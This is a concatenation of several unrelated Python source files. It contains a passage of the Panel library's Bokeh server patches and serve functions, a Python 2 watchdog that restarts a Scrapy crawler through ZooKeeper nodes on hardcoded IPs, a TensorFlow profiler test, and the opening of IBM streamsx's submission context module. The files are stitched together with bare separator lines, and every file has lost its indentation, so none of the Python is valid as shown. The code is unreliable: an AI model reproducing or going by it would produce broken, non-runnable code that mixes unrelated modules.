from .logging import LOG_SESSION_CREATED, LOG_SESSION_DESTROYED, LOG_SESSION_LAUNCHING
from .profile import profile_ctx
from .reload import autoreload_watcher
from .resources import BASE_TEMPLATE, Resources, bundle_resources
from .state import set_curdoc, state
logger = logging.getLogger(__name__)
#---------------------------------------------------------------------
# Private API
#---------------------------------------------------------------------
INDEX_HTML = os.path.join(os.path.dirname(__file__), '..', '_templates', "index.html")
def _origin_url(url):
if url.startswith("http"):
url = url.split("//")[1]
return url
def _server_url(url, port):
if url.startswith("http"):
return '%s:%d%s' % (url.rsplit(':', 1)[0], port, "/")
else:
return 'http://%s:%d%s' % (url.split(':')[0], port, "/")
def _eval_panel(panel, server_id, title, location, doc):
from ..template import BaseTemplate
from ..pane import panel as as_panel
with set_curdoc(doc):
if isinstance(panel, (FunctionType, MethodType)):
panel = panel()
if isinstance(panel, BaseTemplate):
doc = panel._modify_doc(server_id, title, doc, location)
else:
doc = as_panel(panel)._modify_doc(server_id, title, doc, location)
return doc
def async_execute(func):
"""
Wrap async event loop scheduling to ensure that with_lock flag
is propagated from function to partial wrapping it.
"""
if not state.curdoc or not state.curdoc.session_context:
ioloop = IOLoop.current()
event_loop = ioloop.asyncio_loop
if event_loop.is_running():
ioloop.add_callback(func)
else:
event_loop.run_until_complete(func())
return
if isinstance(func, partial) and hasattr(func.func, 'lock'):
unlock = not func.func.lock
else:
unlock = not getattr(func, 'lock', False)
curdoc = state.curdoc
@wraps(func)
async def wrapper(*args, **kw):
with set_curdoc(curdoc):
return await func(*args, **kw)
if unlock:
wrapper.nolock = True
state.curdoc.add_next_tick_callback(wrapper)
param.parameterized.async_executor = async_execute
def _initialize_session_info(session_context):
from ..config import config
session_id = session_context.id
sessions = state.session_info['sessions']
history = -1 if config._admin else config.session_history
if not config._admin and (history == 0 or session_id in sessions):
return
state.session_info['total'] += 1
if history > 0 and len(sessions) >= history:
old_history = list(sessions.items())
sessions = OrderedDict(old_history[-(history-1):])
state.session_info['sessions'] = sessions
sessions[session_id] = {
'launched': dt.datetime.now().timestamp(),
'started': None,
'rendered': None,
'ended': None,
'user_agent': session_context.request.headers.get('User-Agent')
}
state.param.trigger('session_info')
state.on_session_created(_initialize_session_info)
#---------------------------------------------------------------------
# Bokeh patches
#---------------------------------------------------------------------
def server_html_page_for_session(session, resources, title, template=BASE_TEMPLATE,
template_variables=None):
render_item = RenderItem(
token = session.token,
roots = session.document.roots,
use_for_title = False,
)
if template_variables is None:
template_variables = {}
bundle = bundle_resources(session.document.roots, resources)
return html_page_for_render_items(bundle, {}, [render_item], title,
template=template, template_variables=template_variables)
def autoload_js_script(doc, resources, token, element_id, app_path, absolute_url):
resources = Resources.from_bokeh(resources)
bundle = bundle_resources(doc.roots, resources)
render_items = [RenderItem(token=token, elementid=element_id, use_for_title=False)]
bundle.add(Script(script_for_render_items({}, render_items, app_path=app_path, absolute_url=absolute_url)))
return AUTOLOAD_JS.render(bundle=bundle, elementid=element_id)
# Patch Application to handle session callbacks
class Application(BkApplication):
async def on_session_created(self, session_context):
for cb in state._on_session_created:
cb(session_context)
await super().on_session_created(session_context)
def initialize_document(self, doc):
super().initialize_document(doc)
if doc in state._templates:
template = state._templates[doc]
template.server_doc(title=template.title, location=True, doc=doc)
bokeh.command.util.Application = Application
class SessionPrefixHandler:
@contextmanager
def _session_prefix(self):
prefix = self.request.uri.replace(self.application_context._url, '')
if not prefix.endswith('/'):
prefix += '/'
base_url = urljoin('/', prefix)
rel_path = '/'.join(['..'] * self.application_context._url.strip('/').count('/'))
old_url, old_rel = state.base_url, state.rel_path
# Handle autoload.js absolute paths
abs_url = self.get_argument('bokeh-absolute-url', default=None)
if abs_url is not None:
app_path = self.get_argument('bokeh-app-path', default='')
rel_path = abs_url.replace(app_path, '')
with edit_readonly(state):
state.base_url = base_url
state.rel_path = rel_path
try:
yield
finally:
with edit_readonly(state):
state.base_url = old_url
state.rel_path = old_rel
# Patch Bokeh DocHandler URL
class DocHandler(BkDocHandler, SessionPrefixHandler):
@authenticated
async def get(self, *args, **kwargs):
with self._session_prefix():
session = await self.get_session()
state.curdoc = session.document
logger.info(LOG_SESSION_CREATED, id(session.document))
try:
resources = Resources.from_bokeh(self.application.resources())
page = server_html_page_for_session(
session, resources=resources, title=session.document.title,
template=session.document.template,
template_variables=session.document.template_variables
)
finally:
state.curdoc = None
self.set_header("Content-Type", 'text/html')
self.write(page)
per_app_patterns[0] = (r'/?', DocHandler)
# Patch Bokeh Autoload handler
class AutoloadJsHandler(BkAutoloadJsHandler, SessionPrefixHandler):
''' Implements a custom Tornado handler for the autoload JS chunk
'''
async def get(self, *args, **kwargs):
element_id = self.get_argument("bokeh-autoload-element", default=None)
if not element_id:
self.send_error(status_code=400, reason='No bokeh-autoload-element query parameter')
return
app_path = self.get_argument("bokeh-app-path", default="/")
absolute_url = self.get_argument("bokeh-absolute-url", default=None)
if absolute_url:
server_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(absolute_url))
else:
server_url = None
with self._session_prefix():
session = await self.get_session()
state.curdoc = session.document
try:
resources = Resources.from_bokeh(self.application.resources(server_url))
js = autoload_js_script(
session.document, resources, session.token, element_id,
app_path, absolute_url
)
finally:
state.curdoc = None
self.set_header("Content-Type", 'application/javascript')
self.write(js)
per_app_patterns[3] = (r'/autoload.js', AutoloadJsHandler)
class RootHandler(BkRootHandler):
@authenticated
async def get(self, *args, **kwargs):
if self.index and not self.index.endswith('.html'):
prefix = "" if self.prefix is None else self.prefix
redirect_to = prefix + '.'.join(self.index.split('.')[:-1])
self.redirect(redirect_to)
await super().get(*args, **kwargs)
toplevel_patterns[0] = (r'/?', RootHandler)
bokeh.server.tornado.RootHandler = RootHandler
def modify_document(self, doc):
from bokeh.io.doc import set_curdoc as bk_set_curdoc
from ..config import config
logger.info(LOG_SESSION_LAUNCHING, id(doc))
if config.autoreload:
path = self._runner.path
argv = self._runner._argv
handler = type(self)(filename=path, argv=argv)
self._runner = handler._runner
module = self._runner.new_module()
# If no module was returned it means the code runner has some permanent
# unfixable problem, e.g. the configured source code has a syntax error
if module is None:
return
# One reason modules are stored is to prevent the module
# from being gc'd before the document is. A symptom of a
# gc'd module is that its globals become None. Additionally
# stored modules are used to provide correct paths to
# custom models resolver.
sys.modules[module.__name__] = module
doc.modules._modules.append(module)
old_doc = curdoc()
bk_set_curdoc(doc)
if config.autoreload:
set_curdoc(doc)
state.onload(autoreload_watcher)
sessions = []
try:
def post_check():
newdoc = curdoc()
# Do not let curdoc track modules when autoreload is enabled
# otherwise it will erroneously complain that there is
# a memory leak
if config.autoreload:
newdoc.modules._modules = []
# script is supposed to edit the doc not replace it
if newdoc is not doc:
raise RuntimeError("%s at '%s' replaced the output document" % (self._origin, self._runner.path))
def handle_exception(handler, e):
from bokeh.application.handlers.handler import handle_exception
from ..pane import HTML
# Clean up
del sys.modules[module.__name__]
if hasattr(doc, 'modules'):
doc.modules._modules.remove(module)
else:
doc._modules.remove(module)
bokeh.application.handlers.code_runner.handle_exception = handle_exception
tb = html.escape(traceback.format_exc())
# Serve error
HTML(
f'<b>{type(e).__name__}</b>: {e}</br><pre style="overflow-y: scroll">{tb}</pre>',
css_classes=['alert', 'alert-danger'], sizing_mode='stretch_width'
).servable()
if config.autoreload:
bokeh.application.handlers.code_runner.handle_exception = handle_exception
state._launching.append(doc)
with _monkeypatch_io(self._loggers):
with patch_curdoc(doc):
with profile_ctx(config.profiler) as sessions:
self._runner.run(module, post_check)
def _log_session_destroyed(session_context):
logger.info(LOG_SESSION_DESTROYED, id(doc))
doc.on_session_destroyed(_log_session_destroyed)
finally:
state._launching.remove(doc)
if config.profiler:
try:
path = doc.session_context.request.path
state._profiles[(path, config.profiler)] += sessions
state.param.trigger('_profiles')
except Exception:
pass
bk_set_curdoc(old_doc)
CodeHandler.modify_document = modify_document
# Copied from bokeh 2.4.0, to fix directly in bokeh at some point.
def create_static_handler(prefix, key, app):
# patch
key = '/__patchedroot' if key == '/' else key
route = prefix
route += "/static/(.*)" if key == "/" else key + "/static/(.*)"
if app.static_path is not None:
return (route, StaticFileHandler, {"path" : app.static_path})
return (route, StaticHandler, {})
bokeh.server.tornado.create_static_handler = create_static_handler
#---------------------------------------------------------------------
# Public API
#---------------------------------------------------------------------
def init_doc(doc):
doc = doc or curdoc()
if not doc.session_context:
return doc
thread = threading.current_thread()
if thread:
with set_curdoc(doc):
state._thread_id = thread.ident
session_id = doc.session_context.id
sessions = state.session_info['sessions']
if session_id not in sessions:
return doc
sessions[session_id].update({
'started': dt.datetime.now().timestamp()
})
doc.on_event('document_ready', state._init_session)
return doc
def with_lock(func):
"""
Wrap a callback function to execute with a lock allowing the
function to modify bokeh models directly.
Arguments
---------
func: callable
The callable to wrap
Returns
-------
wrapper: callable
Function wrapped to execute without a Document lock.
"""
if inspect.iscoroutinefunction(func):
@wraps(func)
async def wrapper(*args, **kw):
return await func(*args, **kw)
else:
@wraps(func)
def wrapper(*args, **kw):
return func(*args, **kw)
wrapper.lock = True
return wrapper
def _dispatch_events(doc, events):
"""
Handles dispatch of events which could not be processed in
unlocked decorator.
"""
for event in events:
doc.callbacks.trigger_on_change(event)
@contextmanager
def unlocked():
"""
Context manager which unlocks a Document and dispatches
ModelChangedEvents triggered in the context body to all sockets
on current sessions.
"""
curdoc = state.curdoc
if curdoc is None or curdoc.session_context is None or curdoc.session_context.session is None:
yield
return
connections = curdoc.session_context.session._subscribed_connections
hold = curdoc.callbacks.hold_value
if hold:
old_events = list(curdoc.callbacks._held_events)
else:
old_events = []
curdoc.hold()
try:
yield
locked = False
for conn in connections:
socket = conn._socket
if hasattr(socket, 'write_lock') and socket.write_lock._block._value == 0:
locked = True
break
events = []
for event in curdoc.callbacks._held_events:
if not isinstance(event, ModelChangedEvent) or event in old_events or locked:
events.append(event)
continue
for conn in connections:
socket = conn._socket
ws_conn = getattr(socket, 'ws_connection', False)
if (not hasattr(socket, 'write_message') or
ws_conn is None or (ws_conn and ws_conn.is_closing())):
continue
msg = conn.protocol.create('PATCH-DOC', [event])
WebSocketHandler.write_message(socket, msg.header_json)
WebSocketHandler.write_message(socket, msg.metadata_json)
WebSocketHandler.write_message(socket, msg.content_json)
for header, payload in msg._buffers:
WebSocketHandler.write_message(socket, header)
WebSocketHandler.write_message(socket, payload, binary=True)
curdoc.callbacks._held_events = events
finally:
if hold:
return
try:
curdoc.unhold()
except RuntimeError:
curdoc.add_next_tick_callback(partial(_dispatch_events, curdoc, events))
def serve(panels, port=0, address=None, websocket_origin=None, loop=None,
show=True, start=True, title=None, verbose=True, location=True,
threaded=False, **kwargs):
"""
Allows serving one or more panel objects on a single server.
The panels argument should be either a Panel object or a function
returning a Panel object or a dictionary of these two. If a
dictionary is supplied the keys represent the slugs at which
each app is served, e.g. `serve({'app': panel1, 'app2': panel2})`
will serve apps at /app and /app2 on the server.
Arguments
---------
panel: Viewable, function or {str: Viewable or function}
A Panel object, a function returning a Panel object or a
dictionary mapping from the URL slug to either.
port: int (optional, default=0)
Allows specifying a specific port
address : str
The address the server should listen on for HTTP requests.
websocket_origin: str or list(str) (optional)
A list of hosts that can connect to the websocket.
This is typically required when embedding a server app in
an external web site.
If None, "localhost" is used.
loop : tornado.ioloop.IOLoop (optional, default=IOLoop.current())
The tornado IOLoop to run the Server on
show : boolean (optional, default=True)
Whether to open the server in a new browser tab on start
start : boolean(optional, default=True)
Whether to start the Server
title: str or {str: str} (optional, default=None)
An HTML title for the application or a dictionary mapping
from the URL slug to a customized title
verbose: boolean (optional, default=True)
Whether to print the address and port
location : boolean or panel.io.location.Location
Whether to create a Location component to observe and
set the URL location.
threaded: boolean (default=False)
Whether to start the server on a new Thread
kwargs: dict
Additional keyword arguments to pass to Server instance
"""
kwargs = dict(kwargs, **dict(
port=port, address=address, websocket_origin=websocket_origin,
loop=loop, show=show, start=start, title=title, verbose=verbose,
location=location
))
if threaded:
from tornado.ioloop import IOLoop
kwargs['loop'] = loop = IOLoop() if loop is None else loop
server = StoppableThread(
target=get_server, io_loop=loop, args=(panels,), kwargs=kwargs
)
server_id = kwargs.get('server_id', uuid.uuid4().hex)
state._threads[server_id] = server
server.start()
else:
server = get_server(panels, **kwargs)
return server
class ProxyFallbackHandler(RequestHandler):
"""A `RequestHandler` that wraps another HTTP server callback and
proxies the subpath.
"""
def initialize(self, fallback, proxy=None):
self.fallback = fallback
self.proxy = proxy
def prepare(self):
if self.proxy:
self.request.path = self.request.path.replace(self.proxy, '')
self.fallback(self.request)
self._finished = True
self.on_finish()
def get_static_routes(static_dirs):
"""
Returns a list of tornado routes of StaticFileHandlers given a
dictionary of slugs and file paths to serve.
"""
patterns = []
for slug, path in static_dirs.items():
if not slug.startswith('/'):
slug = '/' + slug
if slug == '/static':
raise ValueError("Static file route may not use /static "
"this is reserved for internal use.")
path = os.path.abspath(path)
if not os.path.isdir(path):
raise ValueError("Cannot serve non-existent path %s" % path)
patterns.append(
(r"%s/(.*)" % slug, StaticFileHandler, {"path": path})
)
return patterns
def get_server(panel, port=0, address=None, websocket_origin=None,
loop=None, show=False, start=False, title=None,
verbose=False, location=True, static_dirs={},
oauth_provider=None, oauth_key=None, oauth_secret=None,
oauth_extra_params={}, cookie_secret=None,
oauth_encryption_key=None, session_history=None, **kwargs):
"""
Returns a Server instance with this panel attached as the root
app.
Arguments
---------
panel: Viewable, function or {str: Viewable}
A Panel object, a function returning a Panel object or a
dictionary mapping from the URL slug to either.
port: int (optional, default=0)
Allows specifying a specific port
address : str
The address the server should listen on for HTTP requests.
websocket_origin: str or list(str) (optional)
A list of hosts that can connect to the websocket.
This is typically required when embedding a server app in
an external web site.
If None, "localhost" is used.
loop : tornado.ioloop.IOLoop (optional, default=IOLoop.current())
The tornado IOLoop to run the Server on.
show : boolean (optional, default=False)
Whether to open the server in a new browser tab on start.
start : boolean(optional, default=False)
Whether to start the Server.
title : str or {str: str} (optional, default=None)
An HTML title for the application or a dictionary mapping
from the URL slug to a customized title.
verbose: boolean (optional, default=False)
Whether to report the address and port.
location : boolean or panel.io.location.Location
Whether to create a Location component to observe and
set the URL location.
static_dirs: dict (optional, default={})
A dictionary of routes and local paths to serve as static file
directories on those routes.
oauth_provider: str
One of the available OAuth providers
oauth_key: str (optional, default=None)
The public OAuth identifier
oauth_secret: str (optional, default=None)
The client secret for the OAuth provider
oauth_extra_params: dict (optional, default={})
Additional information for the OAuth provider
cookie_secret: str (optional, default=None)
A random secret string to sign cookies (required for OAuth)
oauth_encryption_key: str (optional, default=False)
A random encryption key used for encrypting OAuth user
information and access tokens.
session_history: int (optional, default=None)
The amount of session history to accumulate. If set to non-zero
and non-None value will launch a REST endpoint at
/rest/session_info, which returns information about the session
history.
kwargs: dict
Additional keyword arguments to pass to Server instance.
Returns
-------
server : bokeh.server.server.Server
Bokeh Server instance running this panel
"""
from ..config import config
from .rest import REST_PROVIDERS
server_id = kwargs.pop('server_id', uuid.uuid4().hex)
kwargs['extra_patterns'] = extra_patterns = kwargs.get('extra_patterns', [])
if isinstance(panel, dict):
apps = {}
for slug, app in panel.items():
if isinstance(title, dict):
try:
title_ = title[slug]
except KeyError:
raise KeyError(
"Keys of the title dictionnary and of the apps "
f"dictionary must match. No {slug} key found in the "
"title dictionary.")
else:
title_ = title
slug = slug if slug.startswith('/') else '/'+slug
if 'flask' in sys.modules:
from flask import Flask
if isinstance(app, Flask):
wsgi = WSGIContainer(app)
if slug == '/':
raise ValueError('Flask apps must be served on a subpath.')
if not slug.endswith('/'):
slug += '/'
extra_patterns.append(('^'+slug+'.*', ProxyFallbackHandler,
dict(fallback=wsgi, proxy=slug)))
continue
if isinstance(app, pathlib.Path):
app = str(app) # enables serving apps from Paths
if (isinstance(app, str) and (app.endswith(".py") or app.endswith(".ipynb"))
and os.path.isfile(app)):
apps[slug] = build_single_handler_application(app)
else:
handler = FunctionHandler(partial(_eval_panel, app, server_id, title_, location))
apps[slug] = Application(handler)
else:
handler = FunctionHandler(partial(_eval_panel, panel, server_id, title, location))
apps = {'/': Application(handler)}
extra_patterns += get_static_routes(static_dirs)
if session_history is not None:
config.session_history = session_history
if config.session_history != 0:
pattern = REST_PROVIDERS['param']([], 'rest')
extra_patterns.extend(pattern)
state.publish('session_info', state, ['session_info'])
opts = dict(kwargs)
if loop:
loop.make_current()
opts['io_loop'] = loop
elif opts.get('num_procs', 1) == 1:
opts['io_loop'] = IOLoop.current()
if 'index' not in opts:
opts['index'] = INDEX_HTML
if address is not None:
opts['address'] = address
if websocket_origin:
if not isinstance(websocket_origin, list):
websocket_origin = [websocket_origin]
opts['allow_websocket_origin'] = websocket_origin
# Configure OAuth
from ..config import config
if config.oauth_provider:
from ..auth import OAuthProvider
opts['auth_provider'] = OAuthProvider()
if oauth_provider:
config.oauth_provider = oauth_provider
if oauth_key:
config.oauth_key = oauth_key
if oauth_extra_params:
config.oauth_extra_params = oauth_extra_params
if cookie_secret:
config.cookie_secret = cookie_secret
opts['cookie_secret'] = config.cookie_secret
server = Server(apps, port=port, **opts)
if verbose:
address = server.address or 'localhost'
url = f"http://{address}:{server.port}{server.prefix}"
print(f"Launching server at {url}")
state._servers[server_id] = (server, panel, [])
if show:
def show_callback():
server.show('/login' if config.oauth_provider else '/')
server.io_loop.add_callback(show_callback)
def sig_exit(*args, **kwargs):
server.io_loop.add_callback_from_signal(do_stop)
def do_stop(*args, **kwargs):
server.io_loop.stop()
try:
signal.signal(signal.SIGINT, sig_exit)
except ValueError:
pass # Can't use signal on a thread
if start:
server.start()
try:
server.io_loop.start()
except RuntimeError:
pass
return server
class StoppableThread(threading.Thread):
"""Thread class with a stop() method."""
def __init__(self, io_loop=None, **kwargs):
super().__init__(**kwargs)
self.io_loop = io_loop
def run(self):
if hasattr(self, '_target'):
target, args, kwargs = self._target, self._args, self._kwargs
else:
target, args, kwargs = self._Thread__target, self._Thread__args, self._Thread__kwargs
if not target:
return
bokeh_server = None
try:
bokeh_server = target(*args, **kwargs)
finally:
if isinstance(bokeh_server, Server):
try:
bokeh_server.stop()
except Exception:
pass
if hasattr(self, '_target'):
del self._target, self._args, self._kwargs
else:
del self._Thread__target, self._Thread__args, self._Thread__kwargs
def stop(self):
self.io_loop.add_callback(self.io_loop.stop)
|
watchdog.py
|
# -*- coding: utf-8 -*-
from kazoo.client import KazooClient
import os
import logging
import time
import signal
from multiprocessing import Process
main_dir = "obj"
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
signal_dir = '/signal/jingdong' + '_' + sys.argv[1]
task_type = "accurate_jingdong"
keyword = sys.argv[1]
def run_proc():
os.chdir(main_dir +"accurate_jingdong/accurate_jingdong/spiders")
#arg = ["HELLO","crawl", "spider_" + task_type,"--nolog"]
arg = ["HELLO","crawl", "spider_" + task_type, '-a',"keywords=", keyword]
os.execvp("scrapy",arg)
def run_wait(a,b):
try:
os.waitpid(-1, os.WNOHANG)
except Exception,e:
print "no child"
signal.signal(signal.SIGCHLD, run_wait)
watchPid = []
for i in range(1,len(sys.argv)):
watchPid.append(int(sys.argv[i]))
hosts_list = ['123.206.89.123:2181', '123.207.157.135:2181', '118.89.234.46:2181']
signal_dic = {"stop":signal.SIGKILL, "start":signal.SIGCONT, "pause":signal.SIGSTOP, "continue":signal.SIGCONT}
zk = KazooClient(hosts = hosts_list)
logging.basicConfig()
zk.start()
try:
zk.create(signal_dir)
except Exception:
pass
print "watch dog working"
stop_flag = False
@zk.ChildrenWatch(signal_dir)
def signal_watch(children):
if len(children) != 0:
global watchPid
for pid in watchPid:
os.kill(pid, signal_dic[children[0]])
if children[0] == "stop":
global stop_flag
stop_flag = True
def check(pid):
global stop_flag
if stop_flag == True:
sys.exit(0)
try:
os.kill(pid, 0)
return pid
except Exception: #判断
p = Process(target=run_proc)
p.start()
return p.pid
while True:
print "begin check"
global stop_flag
if stop_flag == True:
sys.exit(0)
for pid in watchPid:
newpid = check(pid)
if stop_flag == True:
sys.exit(0)
if newpid != pid:
print "new process"
watchPid.remove(pid)
watchPid.append(newpid)
time.sleep(5)
|
profiler_api_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf 2.x profiler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import os
import threading
import portpicker
from tensorflow.python.distribute import collective_all_reduce_strategy as collective_strategy
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.profiler import profiler_client
from tensorflow.python.profiler import profiler_v2 as profiler
from tensorflow.python.profiler.integration_test import mnist_testing_utils
def _model_setup():
"""Set up a MNIST Keras model for testing purposes.
Builds a MNIST Keras model and returns model information.
Returns:
A tuple of (batch_size, steps, train_dataset, mode)
"""
context.set_log_device_placement(True)
batch_size = 64
steps = 2
with collective_strategy.CollectiveAllReduceStrategy().scope():
# TODO(b/142509827): In rare cases this errors out at C++ level with the
# "Connect failed" error message.
train_ds, _ = mnist_testing_utils.mnist_synthetic_dataset(batch_size, steps)
model = mnist_testing_utils.get_mnist_model((28, 28, 1))
return batch_size, steps, train_ds, model
def _make_temp_log_dir(test_obj):
return test_obj.get_temp_dir()
class ProfilerApiTest(test_util.TensorFlowTestCase):
def _check_tools_pb_exist(self, logdir):
expected_files = [
'overview_page.pb',
'input_pipeline.pb',
'tensorflow_stats.pb',
'kernel_stats.pb',
]
for file in expected_files:
path = os.path.join(logdir, 'plugins/profile/*/*{}'.format(file))
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
def test_single_worker_no_profiling(self):
"""Test single worker without profiling."""
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
def test_single_worker_sampling_mode(self):
"""Test single worker sampling mode."""
def on_worker(port):
logging.info('worker starting server on {}'.format(port))
profiler.start_server(port)
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
logging.info('worker finishing')
def on_profile(port, logdir):
# Request for 30 milliseconds of profile.
duration_ms = 30
options = profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=0,
device_tracer_level=1,
)
profiler_client.trace('localhost:{}'.format(port), logdir, duration_ms,
'', 100, options)
logdir = self.get_temp_dir()
port = portpicker.pick_unused_port()
thread_profiler = threading.Thread(target=on_profile, args=(port, logdir))
thread_worker = threading.Thread(target=on_worker, args=(port,))
thread_worker.start()
thread_profiler.start()
thread_profiler.join()
thread_worker.join(120)
self._check_tools_pb_exist(logdir)
def test_single_worker_programmatic_mode(self):
"""Test single worker programmatic mode."""
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=0,
device_tracer_level=1,
)
profiler.start(logdir, options)
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
profiler.stop()
self._check_tools_pb_exist(logdir)
if __name__ == '__main__':
multi_process_runner.test_main()
|
context.py
|
# coding=utf-8
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2015,2020
"""
Context for submission and build of topologies.
"""
__all__ = ['ContextTypes', 'ConfigParams', 'JobConfig', 'SubmissionResult', 'submit', 'build', 'run']
import logging
import os
import os.path
import shutil
import json
import platform
import subprocess
import threading
import sys
import codecs
import tempfile
import copy
import time
import warnings
import streamsx.rest
import streamsx.rest_primitives
import streamsx._streams._version
import urllib.parse as up
__version__ = streamsx._streams._version.__version__
logger = logging.getLogger(__name__)
#
# Submission of a python graph using the Java Application API
# The JAA is reused to have a single set of code_createJSONFile that creates
# SPL, the toolkit, the bundle and submits it to the relevant
# environment
#
def submit(ctxtype, graph, config=None, username=None, password=None):
"""
Submits a `Topology` (application) using the specified context type.
Used to submit an application for compilation into a Streams application and
execution within an Streaming Analytics service or IBM Streams instance.
`ctxtype` defines how the application will be submitted, see :py:class:`ContextTypes`.
The parameters `username` and `password` are only required when submitting to an
IBM Streams instance and it is required to access the Streams REST API from the
code performing the submit. Accessing data from views created by
:py:meth:`~streamsx.topology.topology.Stream.view` requires access to the Streams REST API.
Args:
ctxtype(str): Type of context the application will be submitted to. A value from :py:class:`ContextTypes`.
graph(Topology): The application topology to be submitted.
config(dict): Configuration for the submission, augmented with values such as a :py:class:`JobConfig` or keys from :py:class:`ConfigParams`.
username(str): Deprecated: Username for the Streams REST api. Use environment variable ``STREAMS_USERNAME`` if using user-password authentication.
password(str): Deprecated: Password for `username`. Use environment variable ``STREAMS_PASSWORD`` if using user-password authentication.
Returns:
SubmissionResult: Result of the submission. Content depends on :py:class:`ContextTypes`
constant passed as `ctxtype`.
"""
streamsx._streams._version._mismatch_check(__name__)
graph = graph.graph
if not graph.operators:
raise ValueError("Topology {0} does not contain any streams.".format(graph.topology.name))
if username or password:
warnings.warn("Use environment variables STREAMS_USERNAME and STREAMS_PASSWORD", DeprecationWarning, stacklevel=2)
context_submitter = _SubmitContextFactory(graph, config, username, password).get_submit_context(ctxtype)
sr = SubmissionResult(context_submitter.submit())
sr._submitter = context_submitter
return sr
def build(topology, config=None, dest=None, verify=None):
"""
Build a topology to produce a Streams application bundle.
Builds a topology using :py:func:`submit` with context type :py:const:`~ContextTypes.BUNDLE`. The result is a sab file on the local file system along
with a job config overlay file matching the application.
The build uses a build service or a local install, see :py:const:`~ContextTypes.BUNDLE` for details.
Args:
topology(Topology): Application topology to be built.
config(dict): Configuration for the build.
dest(str): Destination directory for the sab and JCO files. Default is context specific.
verify: SSL verification used by requests when using a build service. Defaults to enabling SSL verification.
Returns:
3-element tuple containing
- **bundle_path** (*str*): path to the bundle (sab file) or ``None`` if not created.
- **jco_path** (*str*): path to file containing the job config overlay for the application or ``None`` if not created.
- **result** (*SubmissionResult*): value returned from ``submit``.
.. seealso:: :py:const:`~ContextTypes.BUNDLE` for details on how to configure the build service to use.
.. versionadded:: 1.14
"""
if verify is not None:
config = config.copy() if config else dict()
config[ConfigParams.SSL_VERIFY] = verify
sr = submit(ContextTypes.BUNDLE, topology, config=config)
if 'bundlePath' in sr:
if dest:
bundle = sr['bundlePath']
bundle_dest = os.path.join(dest, os.path.basename(bundle))
if os.path.exists(bundle_dest): os.remove(bundle_dest)
shutil.move(bundle, dest)
sr['bundlePath'] = bundle_dest
jco = sr['jobConfigPath']
jco_dest = os.path.join(dest, os.path.basename(jco))
if os.path.exists(jco_dest): os.remove(jco_dest)
shutil.move(jco, dest)
sr['jobConfigPath'] = jco_dest
return sr['bundlePath'], sr['jobConfigPath'], sr
return None, None, sr
class _BaseSubmitter(object):
"""
A submitter which handles submit operations common across all submitter types..
"""
def __init__(self, ctxtype, config, graph):
self.ctxtype = ctxtype
self.config = dict()
if config is not None:
# Make copy of config to avoid modifying
# the callers config
self.config.update(config)
# When SERVICE_DEFINITION is a String, it is assumed that
# it is JSON SAS credentials, which must be converted to a JSON object
service_def = self.config.get(ConfigParams.SERVICE_DEFINITION)
if service_def:
if isinstance(service_def, str):
self.config[ConfigParams.SERVICE_DEFINITION] = json.loads(service_def)
self.config['contextType'] = str(self.ctxtype)
if 'originator' not in self.config:
self.config['originator'] = 'topology-' + __version__ + ':python-' + platform.python_version()
self.graph = graph
self.fn = None
self.results_file = None
self.keepArtifacts = False
if 'topology.keepArtifacts' in self.config:
self.keepArtifacts = self.config.get('topology.keepArtifacts')
def _config(self):
"Return the submit configuration"
return self.config
def submit(self):
# Convert the JobConfig into overlays
self._create_job_config_overlays()
# encode the relevant python version information into the config
self._add_python_info()
# Create the json file containing the representation of the application
try:
self._create_json_file(self._create_full_json())
except IOError:
logger.error("Error writing json graph to file.")
raise
try:
return self._submit_exec()
finally:
if not self.keepArtifacts:
_delete_json(self)
def _submit_exec(self):
tk_root = self._get_toolkit_root()
cp = os.path.join(tk_root, "lib", "com.ibm.streamsx.topology.jar")
remote_context = False
streams_install = os.environ.get('STREAMS_INSTALL')
# If there is no streams install, get java from JAVA_HOME and use the remote contexts.
if streams_install is None:
java_home = os.environ.get('JAVA_HOME')
if java_home is None:
raise ValueError("JAVA_HOME not found. Please set the JAVA_HOME system variable")
jvm = os.path.join(java_home, "bin", "java")
remote_context = True
# Otherwise, use the Java version from the streams install
else:
jvm = os.path.join(streams_install, "java", "jre", "bin", "java")
if self.config.get(ConfigParams.FORCE_REMOTE_BUILD):
remote_context = True
cp = cp + ':' + os.path.join(streams_install, "lib", "com.ibm.streams.operator.samples.jar")
progress_fn = lambda _ : None
if remote_context:
submit_class = "com.ibm.streamsx.topology.context.remote.RemoteContextSubmit"
try:
# Verify we are in a IPython env.
get_ipython() # noqa : F821
import ipywidgets as widgets
logger.debug("ipywidgets available - creating IntProgress")
progress_bar = widgets.IntProgress(
value=0,
min=0, max=10, step=1,
description='Initializing',
bar_style='info', orientation='horizontal',
style={'description_width':'initial'})
logger.debug("ipywidgets available - created IntProgress")
try:
display(progress_bar) # noqa : F821
def _show_progress(msg):
if msg is True:
progress_bar.value = progress_bar.max
progress_bar.bar_style = 'success'
return
if msg is False:
progress_bar.bar_style = 'danger'
return
msg = msg.split('-')
progress_bar.value += 1
progress_bar.description = msg[3]
progress_fn = _show_progress
except:
logger.debug("ipywidgets IntProgress error: %s", sys.exc_info()[1])
pass
except:
logger.debug("ipywidgets not available: %s", sys.exc_info()[1])
pass
else:
submit_class = "com.ibm.streamsx.topology.context.local.StreamsContextSubmit"
